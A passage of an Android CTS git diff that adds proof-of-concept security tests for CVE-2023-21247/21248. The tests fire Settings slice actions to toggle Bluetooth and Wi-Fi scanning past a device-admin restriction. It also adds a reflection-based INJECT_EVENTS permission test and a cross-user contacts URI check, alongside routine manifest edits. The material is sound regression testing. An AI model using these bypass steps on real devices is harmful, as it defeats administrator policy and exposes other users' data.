+                    mContext.getPackageManager().getResourcesForApplication(mSettingsPackage);
+
+            // Set DISALLOW_CONFIG_LOCATION restriction for the current user
+            mContext.getSystemService(DevicePolicyManager.class)
+                    .addUserRestriction(
+                            new ComponentName(mContext, PocDeviceAdminReceiver.class),
+                            DISALLOW_CONFIG_LOCATION);
+            assumeTrue(
+                    "Failed to set user restriction DISALLOW_CONFIG_LOCATION",
+                    mContext.getSystemService(UserManager.class)
+                            .getUserRestrictions()
+                            .getBoolean(DISALLOW_CONFIG_LOCATION));
+            Object intent =
+                    SliceProvider.createPermissionIntent(
+                            mContext,
+                            Uri.parse(mBaseUri),
+                            "android.security.cts.TestLocationScanningServicesUsingSlices");
+
+            // For Android SC and SC-V2 createPermissionIntent returns an instance of
+            // PendingIntent
+            if (intent instanceof PendingIntent) {
+                ((PendingIntent) intent).send();
+            }
+
+            // For Android T and above createPermissionIntent returns an instance of
+            // Intent
+            if (intent instanceof Intent) {
+                mContext.startActivity(((Intent) intent).addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+            }
+
+            // Grant SLICE_PERMISSION by clicking on 'Allow'
+            Pattern allowPattern = Pattern.compile("Allow", Pattern.CASE_INSENSITIVE);
+            assumeTrue(mDevice.wait(Until.hasObject(By.text(allowPattern)), waitMS));
+            UiObject2 allowButton = mDevice.findObject(By.text(allowPattern));
+            allowButton.click();
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    @Test
+    public void testPocCVE_2023_21247() {
+        try {
+            final int initialBleScanGlobalSetting =
+                    Settings.Global.getInt(
+                            mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+            assumeTrue(initialBleScanGlobalSetting != -1);
+
+            // Launching PocActivity to launch "bluetooth_always_scanning_switch" settings
+            // slice using slice-uri
+            mContext.startActivity(
+                    new Intent(mContext, PocActivity.class)
+                            .setData(Uri.parse(mBaseUri + "bluetooth_always_scanning_switch"))
+                            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // Wait for the slice that contains option to toggle "Bluetooth scanning"
+            String btScanningText =
+                    mSettingsResources.getString(
+                            mSettingsResources.getIdentifier(
+                                    "location_scanning_bluetooth_always_scanning_title",
+                                    "string",
+                                    mSettingsPackage));
+            boolean btScanningFound =
+                    mDevice.wait(
+                            Until.hasObject(By.text(btScanningText).res(mScanningTextResId)),
+                            waitMS);
+            assumeTrue(
+                    "Timed out waiting on the text \'" + btScanningText + "\' to appear",
+                    btScanningFound);
+
+            // Try to toggle "Bluetooth scanning" button, it is supposed to be disabled by the
+            // Device Admin in presence of fix
+            UiObject2 btScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+            btScanningToggle.click();
+
+            // Value of isChecked is whether "Bluetooth scanning" button should be checked or
+            // unchecked after click()
+            assumeTrue(
+                    "Timed out waiting on the button \'" + btScanningToggle + "\' to toggle",
+                    btScanningToggle.wait(
+                                    Until.checked(initialBleScanGlobalSetting == 0 /* isChecked */),
+                                    waitMS)
+                            || !btScanningToggle.isEnabled());
+
+            final int finalBleScanGlobalSetting =
+                    Settings.Global.getInt(
+                            mContentResolver, Settings.Global.BLE_SCAN_ALWAYS_AVAILABLE, -1);
+            assumeTrue(finalBleScanGlobalSetting != -1);
+
+            assertFalse(
+                    "Device is vulnerable to b/277333781 !!",
+                    finalBleScanGlobalSetting != initialBleScanGlobalSetting);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+
+    @Test
+    public void testPocCVE_2023_21248() {
+        try {
+            final int initialWifiScanGlobalSetting =
+                    Settings.Global.getInt(
+                            mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+            assumeTrue(initialWifiScanGlobalSetting != -1);
+
+            // Launching PocActivity to launch "wifi_always_scanning_switch" settings
+            // slice using slice-uri
+            mContext.startActivity(
+                    new Intent(mContext, PocActivity.class)
+                            .setData(Uri.parse(mBaseUri + "wifi_always_scanning_switch"))
+                            .addFlags(Intent.FLAG_ACTIVITY_NEW_TASK));
+
+            // Wait for the slice that contains option to toggle "Wifi scanning"
+            String wifiScanningText =
+                    mSettingsResources.getString(
+                            mSettingsResources.getIdentifier(
+                                    "location_scanning_wifi_always_scanning_title",
+                                    "string",
+                                    mSettingsPackage));
+            boolean wifiScanningFound =
+                    mDevice.wait(
+                            Until.hasObject(By.text(wifiScanningText).res(mScanningTextResId)),
+                            waitMS);
+            assumeTrue(
+                    "Timed out waiting on the text \'" + wifiScanningText + "\' to appear",
+                    wifiScanningFound);
+
+            // Try to toggle "Wifi scanning" button, it is supposed to be disabled by the
+            // Device Admin in presence of fix
+            UiObject2 wifiScanningToggle = mDevice.findObject(By.res(mScanningWidgetResId));
+            wifiScanningToggle.click();
+
+            // Value of isChecked is whether "Wifi scanning" button should be checked or
+            // unchecked after click()
+            assumeTrue(
+                    "Timed out waiting on the button \'" + wifiScanningToggle + "\' to toggle",
+                    wifiScanningToggle.wait(
+                                    Until.checked(
+                                            initialWifiScanGlobalSetting == 0 /* isChecked */),
+                                    waitMS)
+                            || !wifiScanningToggle.isEnabled());
+
+            final int finalWifiScanGlobalSetting =
+                    Settings.Global.getInt(
+                            mContentResolver, Settings.Global.WIFI_SCAN_ALWAYS_AVAILABLE, -1);
+            assumeTrue(finalWifiScanGlobalSetting != -1);
+
+            assertFalse(
+                    "Device is vulnerable to b/277333746 !!",
+                    finalWifiScanGlobalSetting != initialWifiScanGlobalSetting);
+        } catch (Exception e) {
+            assumeNoException(e);
+        }
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
new file mode 100644
index 0000000..c322cb9
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocActivity.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2023 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.TestLocationScanningServicesUsingSlices;
+
+import static android.app.slice.SliceItem.FORMAT_ACTION;
+import static android.app.slice.SliceItem.FORMAT_SLICE;
+
+import androidx.fragment.app.FragmentActivity;
+import androidx.lifecycle.LiveData;
+import androidx.slice.Slice;
+import androidx.slice.SliceItem;
+import androidx.slice.widget.SliceLiveData;
+
+public class PocActivity extends FragmentActivity {
+
+    @Override
+    protected void onResume() {
+        try {
+            super.onResume();
+            LiveData sliceLiveData =
+                    SliceLiveData.fromUri(this /* Context */, getIntent().getData());
+            sliceLiveData.observe(
+                    this /* LifecycleOwner */,
+                    slice -> {
+                        if (slice != null) {
+                            for (SliceItem outerItem : ((Slice) slice).getItems()) {
+                                if (outerItem.getFormat().equals(FORMAT_SLICE)) {
+                                    for (SliceItem innerItem : outerItem.getSlice().getItems()) {
+                                        if (innerItem.getFormat().equals(FORMAT_ACTION)) {
+                                            try {
+                                                innerItem.fireAction(null, null);
+                                            } catch (Exception ignored) {
+                                                // Ignore all exceptions. Any exception here results
+                                                // in assumption failure in devicetest and prints
+                                                // appropriate logs
+                                            }
+                                        }
+                                    }
+                                    break;
+                                }
+                            }
+                        }
+                    });
+        } catch (Exception ignored) {
+            // Ignore all exceptions. Any exception here results in assumption failure in devicetest
+            // and prints appropriate logs
+        }
+    }
+}
diff --git a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
similarity index 69%
copy from tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
copy to hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
index 4416990..98be098 100644
--- a/tests/tests/security/src/android/security/cts/CVE_2022_20143/PocActivity.java
+++ b/hostsidetests/securitybulletin/test-apps/TestLocationScanningServicesUsingSlices/src/android/security/cts/TestLocationScanningServicesUsingSlices/PocDeviceAdminReceiver.java
@@ -1,5 +1,5 @@
 /*
- * Copyright (C) 2022 The Android Open Source Project
+ * Copyright (C) 2023 The Android Open Source Project
  *
  * Licensed under the Apache License, Version 2.0 (the "License");
  * you may not use this file except in compliance with the License.
@@ -14,9 +14,8 @@
  * limitations under the License.
  */
 
-package android.security.cts.CVE_2022_20143;
+package android.security.cts.TestLocationScanningServicesUsingSlices;
 
-import android.app.Activity;
+import android.app.admin.DeviceAdminReceiver;
 
-public class PocActivity extends Activity {
-}
+public class PocDeviceAdminReceiver extends DeviceAdminReceiver {}
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
index dcbb59a..c9c3c04 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp/AndroidManifest.xml
@@ -29,5 +29,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.server.cts.device.statsdalarmhelper"
          android:label="Alarm related statsd CTS tests">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
index 2bd7e12..f5939fe 100644
--- a/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/alarmhelperapp2/AndroidManifest.xml
@@ -29,5 +29,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.server.cts.device.statsdalarmhelper2"
          android:label="Alarm related statsd CTS tests 2">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
index 72a57d8..a792332 100644
--- a/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
+++ b/hostsidetests/statsdatom/apps/statsdapp/AndroidManifest.xml
@@ -141,5 +141,7 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="com.android.server.cts.device.statsdatom"
          android:label="CTS tests of android.os.statsdatom stats collection">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 </manifest>
diff --git a/hostsidetests/ui/control/AndroidManifest.xml b/hostsidetests/ui/control/AndroidManifest.xml
index 4e2c60b..85f0ba8 100644
--- a/hostsidetests/ui/control/AndroidManifest.xml
+++ b/hostsidetests/ui/control/AndroidManifest.xml
@@ -27,5 +27,8 @@
     <instrumentation
         android:targetPackage="android.taskswitching.control.cts"
         android:name="androidx.test.runner.AndroidJUnitRunner" >
+        <meta-data
+            android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 </manifest>
diff --git a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
index 2dfb579..37a5a1b 100644
--- a/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
+++ b/tests/AlarmManager/src/android/alarmmanager/cts/BackgroundRestrictedAlarmsTest.java
@@ -115,8 +115,10 @@
         updateAlarmManagerConstants();
         mActivityManagerDeviceConfigStateHelper
                 .set("bg_auto_restricted_bucket_on_bg_restricted", "false");
-        SystemUtil.runWithShellPermissionIdentity(() ->
-                DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT));
+        SystemUtil.runWithShellPermissionIdentity(() -> {
+            mInitialSyncDisabledMode = DeviceConfig.getSyncDisabledMode();
+            DeviceConfig.setSyncDisabledMode(DeviceConfig.SYNC_DISABLED_MODE_UNTIL_REBOOT);
+        });
         AppOpsUtils.setOpMode(TEST_APP_PACKAGE, OPSTR_RUN_ANY_IN_BACKGROUND, MODE_IGNORED);
         makeUidIdle();
         setAppStandbyBucket("active");
diff --git a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
index ea3e2f7..f49f7e1 100644
--- a/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
+++ b/tests/PhotoPicker/src/android/photopicker/cts/PhotoPickerBaseTest.java
@@ -20,8 +20,8 @@
 import android.content.Context;
 import android.content.Intent;
 import android.content.pm.PackageManager;
-import android.text.TextUtils;
 import android.os.UserHandle;
+import android.text.TextUtils;
 import android.util.Log;
 
 import androidx.annotation.Nullable;
diff --git a/tests/acceleration/AndroidManifest.xml b/tests/acceleration/AndroidManifest.xml
index 59c1b64..e03f56f 100644
--- a/tests/acceleration/AndroidManifest.xml
+++ b/tests/acceleration/AndroidManifest.xml
@@ -32,6 +32,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
             android:targetPackage="android.acceleration.cts"
             android:label="Tests for the Hardware Acceleration APIs." >
+        <meta-data android:name="listener"
+                android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/accessibility/AndroidManifest.xml b/tests/accessibility/AndroidManifest.xml
index 53304a2..1fe3cb6 100644
--- a/tests/accessibility/AndroidManifest.xml
+++ b/tests/accessibility/AndroidManifest.xml
@@ -108,6 +108,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.view.accessibility.cts"
          android:label="Tests for the accessibility APIs.">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/accessibility/AndroidTest.xml b/tests/accessibility/AndroidTest.xml
index 50c7791..0ec90a0 100644
--- a/tests/accessibility/AndroidTest.xml
+++ b/tests/accessibility/AndroidTest.xml
@@ -24,6 +24,10 @@
     <target_preparer class="com.android.tradefed.targetprep.RunCommandTargetPreparer">
         <option name="run-command" value="cmd accessibility set-bind-instant-service-allowed true" />
         <option name="teardown-command" value="cmd accessibility set-bind-instant-service-allowed false" />
+	<!-- Enable hidden APIs to allow tests to use reflection, for security tests which
+             check reflection abuse. This must be set before installing the test app. -->
+        <option name="run-command" value="settings put global hidden_api_policy 1" />
+        <option name="teardown-command" value="settings delete global hidden_api_policy" />
     </target_preparer>
     <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller">
         <option name="cleanup-apks" value="true" />
diff --git a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
index 6c21058..1c8f684 100644
--- a/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
+++ b/tests/accessibility/src/android/view/accessibility/cts/AccessibilityManagerTest.java
@@ -18,12 +18,17 @@
 
 import static android.accessibility.cts.common.InstrumentedAccessibilityService.TIMEOUT_SERVICE_ENABLE;
 
+import static com.google.common.truth.Truth.assertThat;
+
 import static org.junit.Assert.assertEquals;
 import static org.junit.Assert.assertFalse;
 import static org.junit.Assert.assertSame;
+import static org.junit.Assert.assertThrows;
 import static org.junit.Assert.assertTrue;
 import static org.junit.Assert.fail;
 
+
+import android.Manifest;
 import android.accessibility.cts.common.AccessibilityDumpOnFailureRule;
 import android.accessibility.cts.common.InstrumentedAccessibilityService;
 import android.accessibility.cts.common.InstrumentedAccessibilityServiceTestRule;
@@ -32,9 +37,12 @@
 import android.app.Service;
 import android.app.UiAutomation;
 import android.content.Context;
+import android.content.pm.PackageManager;
 import android.content.pm.ServiceInfo;
 import android.os.Handler;
 import android.platform.test.annotations.AsbSecurityTest;
+import android.view.InputEvent;
+import android.view.MotionEvent;
 import android.view.accessibility.AccessibilityEvent;
 import android.view.accessibility.AccessibilityManager;
 import android.view.accessibility.AccessibilityManager.AccessibilityServicesStateChangeListener;
@@ -58,6 +66,9 @@
 import org.junit.runner.RunWith;
 
 import java.io.IOException;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationTargetException;
+import java.lang.reflect.Method;
 import java.util.List;
 import java.util.concurrent.atomic.AtomicBoolean;
 
@@ -202,6 +213,32 @@
         assertFalse(mAccessibilityManager.removeAccessibilityServicesStateChangeListener(listener));
     }
 
+    @AsbSecurityTest(cveBugId = {309426390})
+    @Test
+    public void testInjectInputEventToInputFilter_throwsWithoutInjectEventsPermission()
+            throws Exception {
+        // Ensure the test itself doesn't have INJECT_EVENTS permission before
+        // calling the method that requires it and expecting failure.
+        assertThat(sInstrumentation.getContext().checkSelfPermission(
+                Manifest.permission.INJECT_EVENTS)).isEqualTo(PackageManager.PERMISSION_DENIED);
+
+        // Use reflection to directly invoke IAccessibilityManager#injectInputEventToInputFilter.
+        final AccessibilityManager accessibilityManager = (AccessibilityManager)
+                sInstrumentation.getContext().getSystemService(Service.ACCESSIBILITY_SERVICE);
+        final Field serviceField = AccessibilityManager.class.getDeclaredField("mService");
+        serviceField.setAccessible(true);
+        final Method injectInputEventToInputFilter =
+                Class.forName("android.view.accessibility.IAccessibilityManager")
+                        .getDeclaredMethod("injectInputEventToInputFilter", InputEvent.class);
+
+        final InvocationTargetException exception = assertThrows(InvocationTargetException.class,
+                () -> injectInputEventToInputFilter.invoke(
+                        serviceField.get(accessibilityManager),
+                        MotionEvent.obtain(0, 0, 0, 0, 0, 0)));
+        assertThat(exception).hasCauseThat().isInstanceOf(SecurityException.class);
+        assertThat(exception).hasCauseThat().hasMessageThat().contains("INJECT_EVENTS");
+    }
+
     @Test
     public void testGetInstalledAccessibilityServicesList() throws Exception {
         List<AccessibilityServiceInfo> installedServices =
diff --git a/tests/accessibilityservice/AndroidManifest.xml b/tests/accessibilityservice/AndroidManifest.xml
index d3033f6..550c8e7 100644
--- a/tests/accessibilityservice/AndroidManifest.xml
+++ b/tests/accessibilityservice/AndroidManifest.xml
@@ -308,6 +308,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.accessibilityservice.cts"
          android:label="Tests for the accessibility APIs.">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
 
     </instrumentation>
 
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
index d4a5df6..2baf74e 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/TouchInteractionControllerTest.java
@@ -21,12 +21,10 @@
 import static android.accessibilityservice.cts.utils.GestureUtils.click;
 import static android.accessibilityservice.cts.utils.GestureUtils.dispatchGesture;
 import static android.accessibilityservice.cts.utils.GestureUtils.doubleTap;
-import static android.accessibilityservice.cts.utils.GestureUtils.interruptedSwipe;
 import static android.accessibilityservice.cts.utils.GestureUtils.swipe;
 import static android.view.MotionEvent.ACTION_DOWN;
 import static android.view.MotionEvent.ACTION_HOVER_ENTER;
 import static android.view.MotionEvent.ACTION_HOVER_EXIT;
-import static android.view.MotionEvent.ACTION_HOVER_MOVE;
 import static android.view.MotionEvent.ACTION_MOVE;
 import static android.view.MotionEvent.ACTION_POINTER_DOWN;
 import static android.view.MotionEvent.ACTION_POINTER_UP;
@@ -240,40 +238,7 @@
         mTouchListener.assertNonePropagated();
     }
 
-    /**
-     * Test whether interrupting and continuing touch exploration generates a consistent motion
-     * event stream.
-     */
-    @Test
-    @AppModeFull
-    public void testInterruptedSwipe_generatesConsistentEventStream() {
-        if (!mHasTouchscreen || !mScreenBigEnough) return;
-        assertBasicConsistency();
-        mController.registerCallback(
-                Executors.newSingleThreadExecutor(),
-                new BaseCallback() {
-                    public void onMotionEvent(MotionEvent event) {
-                        if (event.getActionMasked() == ACTION_DOWN
-                                && mController.getState()
-                                        != TouchInteractionController.STATE_TOUCH_EXPLORING) {
-                            mController.requestTouchExploration();
-                        }
-                    }
-                });
-        PointF startPoint = add(mTapLocation, -mSwipeDistance, 0);
-        PointF endPoint = add(mTapLocation, mSwipeDistance, 0);
-        dispatch(interruptedSwipe(startPoint, endPoint, mSwipeTimeMillis));
-        mHoverListener.assertPropagated(ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
-        // If the touch exploration request arrives to the framework too late, we might only see one
-        // hover interaction that combines both swipes.
-        // All we care about is that the stream is consistent.
-        if (mHoverListener.peek() != null) {
-            mHoverListener.assertPropagated(
-                    ACTION_HOVER_ENTER, ACTION_HOVER_MOVE, ACTION_HOVER_EXIT);
-        }
-    }
-
-/** Test whether we can initiate a drag. */
+    /** Test whether we can initiate a drag. */
     @Test
     @AppModeFull
     @FlakyTest
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
index 8d5e2e8..c0ce0d2 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/EventCapturingHoverListener.java
@@ -108,8 +108,4 @@
             throw new RuntimeException(e);
         }
     }
-
-    public MotionEvent peek() {
-        return mEvents.peek();
-    }
 }
diff --git a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
index 86fa5bc..32e2b8f0 100644
--- a/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
+++ b/tests/accessibilityservice/src/android/accessibilityservice/cts/utils/GestureUtils.java
@@ -106,22 +106,6 @@
         return new StrokeDescription(path(from, to), 0, duration);
     }
 
-    /**
-     * Simulates a touch exploration swipe that is interrupted partway through for a specified
-     * amount of time, and then continued.
-     */
-    public static GestureDescription interruptedSwipe(PointF from, PointF to, long duration) {
-        GestureDescription.Builder builder = new GestureDescription.Builder();
-        long time = 0;
-        PointF midpoint = new PointF((from.x + to.x) / 2.0f, (from.y + to.y) / 2.0f);
-        StrokeDescription swipe1 = new StrokeDescription(path(from, midpoint), 0, duration / 2);
-        builder.addStroke(swipe1);
-        time += swipe1.getDuration() + STROKE_TIME_GAP_MS;
-        StrokeDescription swipe2 = startingAt(time, swipe(midpoint, to, duration / 2));
-        builder.addStroke(swipe2);
-        return builder.build();
-    }
-
     public static StrokeDescription drag(StrokeDescription from, PointF to) {
         return from.continueStroke(
                 path(lastPointOf(from), to),
diff --git a/tests/accessibilityservice/testsdk29/AndroidManifest.xml b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
index 096ab69..ad47ad7 100644
--- a/tests/accessibilityservice/testsdk29/AndroidManifest.xml
+++ b/tests/accessibilityservice/testsdk29/AndroidManifest.xml
@@ -42,6 +42,8 @@
     <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
          android:targetPackage="android.accessibilityservice.cts.testsdk29"
          android:label="Tests for the accessibility Sdk 29 APIs.">
+        <meta-data android:name="listener"
+             android:value="com.android.cts.runner.CtsTestRunListener"/>
     </instrumentation>
 
 </manifest>
diff --git a/tests/admin/AndroidManifest.xml b/tests/admin/AndroidManifest.xml
index 4341b15..54adff3 100644
--- a/tests/admin/AndroidManifest.xml
+++ b/tests/admin/AndroidManifest.xml
@@ -27,6 +27,8 @@
   <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
                    android:targetPackage="android.admin.app"
                    android:label="Tests for the admin APIs.">
+        <meta-data android:name="listener"
+            android:value="com.android.cts.runner.CtsTestRunListener" />
     </instrumentation>
 
 </manifest>
diff --git a/tests/app/Android.bp b/tests/app/Android.bp
index 0652fab..c8f3dcb 100644
--- a/tests/app/Android.bp
+++ b/tests/app/Android.bp
@@ -103,7 +103,7 @@
         "general-tests",
     ],
     sdk_version: "test_current",
-    min_sdk_version: "14",
+    min_sdk_version: "19",
     manifest: "DownloadManagerApi28Test/AndroidManifest.xml",
     test_config: "DownloadManagerApi28Test/AndroidTest.xml",
     lint: {
@@ -139,7 +139,7 @@
         "general-tests",
     ],
     sdk_version: "test_current",
-    min_sdk_version: "14",
+    min_sdk_version: "19",
     manifest: "DownloadManagerInstallerTest/AndroidManifest.xml",
     test_config: "DownloadManagerInstallerTest/AndroidTest.xml",
     lint: {
diff --git a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
index d19df19..d384327 100644
--- a/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
+++ b/tests/appsearch/src/com/android/cts/appsearch/external/app/SearchSpecCtsTest.java
@@ -69,10 +69,10 @@
                                 SearchSpec.GROUPING_TYPE_PER_NAMESPACE
                                         | SearchSpec.GROUPING_TYPE_PER_PACKAGE,
                                 /*limit=*/ 37)
-                        .addProjection("schemaTypes1", expectedPropertyPaths1)
-                        .addProjection("schemaTypes2", expectedPropertyPaths2)
-                        .setPropertyWeights("schemaTypes1", expectedPropertyWeights)
-                        .setPropertyWeightPaths("schemaTypes2", expectedPropertyWeightPaths)
+                        .addProjection("schemaType1", expectedPropertyPaths1)
+                        .addProjection("schemaType2", expectedPropertyPaths2)
+                        .setPropertyWeights("schemaType1", expectedPropertyWeights)
+                        .setPropertyWeightPaths("schemaType2", expectedPropertyWeightPaths)
                         .setNumericSearchEnabled(true)
                         .setVerbatimSearchEnabled(true)
                         .setListFilterQueryLanguageEnabled(true)
@@ -101,21 +101,21 @@
                                 | SearchSpec.GROUPING_TYPE_PER_PACKAGE);
         assertThat(searchSpec.getProjections())
                 .containsExactly(
-                        "schemaTypes1",
+                        "schemaType1",
                         expectedPropertyPaths1,
-                        "schemaTypes2",
+                        "schemaType2",
                         expectedPropertyPaths2);
         assertThat(searchSpec.getResultGroupingLimit()).isEqualTo(37);
         assertThat(searchSpec.getPropertyWeights().keySet())
-                .containsExactly("schemaTypes1", "schemaTypes2");
-        assertThat(searchSpec.getPropertyWeights().get("schemaTypes1"))
+                .containsExactly("schemaType1", "schemaType2");
+        assertThat(searchSpec.getPropertyWeights().get("schemaType1"))
                 .containsExactly("property1", 1.0, "property2", 2.0);
-        assertThat(searchSpec.getPropertyWeights().get("schemaTypes2"))
+        assertThat(searchSpec.getPropertyWeights().get("schemaType2"))
                 .containsExactly("property1.nested", 1.0);
-        assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes1"))
+        assertThat(searchSpec.getPropertyWeightPaths().get("schemaType1"))
                 .containsExactly(
                         new PropertyPath("property1"), 1.0, new PropertyPath("property2"), 2.0);
-        assertThat(searchSpec.getPropertyWeightPaths().get("schemaTypes2"))
+        assertThat(searchSpec.getPropertyWeightPaths().get("schemaType2"))
                 .containsExactly(new PropertyPath("property1.nested"), 1.0);
         assertThat(searchSpec.isNumericSearchEnabled()).isTrue();
         assertThat(searchSpec.isVerbatimSearchEnabled()).isTrue();
diff --git a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
index bab038c..0e43f33 100644
--- a/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
+++ b/tests/autofillservice/src/android/autofillservice/cts/dialog/LoginActivityTest.java
@@ -36,6 +36,7 @@
 
 import static com.google.common.truth.Truth.assertThat;
 
+import static org.junit.Assert.assertThrows;
 import static org.junit.Assume.assumeTrue;
 
 import android.autofillservice.cts.R;
@@ -50,13 +51,16 @@
 import android.autofillservice.cts.testcore.IdMode;
 import android.autofillservice.cts.testcore.InstrumentedAutoFillService.FillRequest;
 import android.content.Intent;
+import android.graphics.drawable.Icon;
 import android.platform.test.annotations.FlakyTest;
 import android.util.Log;
 import android.view.View;
+import android.widget.RemoteViews;
 
 import androidx.test.uiautomator.UiObject2;
 
 import com.android.compatibility.common.util.CddTest;
+import com.android.compatibility.common.util.RetryableException;
 
 import org.junit.After;
 import org.junit.Test;
@@ -977,6 +981,51 @@
         assertThat(v.isCredential()).isFalse();
     }
 
+    @Test
+    public void remoteViews_doesNotSpillAcrossUsers() throws Exception {
+        enableFillDialogFeature(sContext);
+        enableService();
+
+        RemoteViews header = createPresentation("Dialog Header");
+        RemoteViews dialogRv = createPresentation("Dialog Presentation");
+        // bad url, should not be displayed
+        header.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+                "content://1000@com.android.contacts/display_photo/1"));
+        dialogRv.setImageViewIcon(R.id.icon, Icon.createWithContentUri(
+                "content://1000@com.android.contacts/display_photo/1"));
+
+        // Set response with a dataset
+        final CannedFillResponse.Builder builder = new CannedFillResponse.Builder()
+                .addDataset(new CannedDataset.Builder()
+                    .setField(ID_USERNAME, "dude")
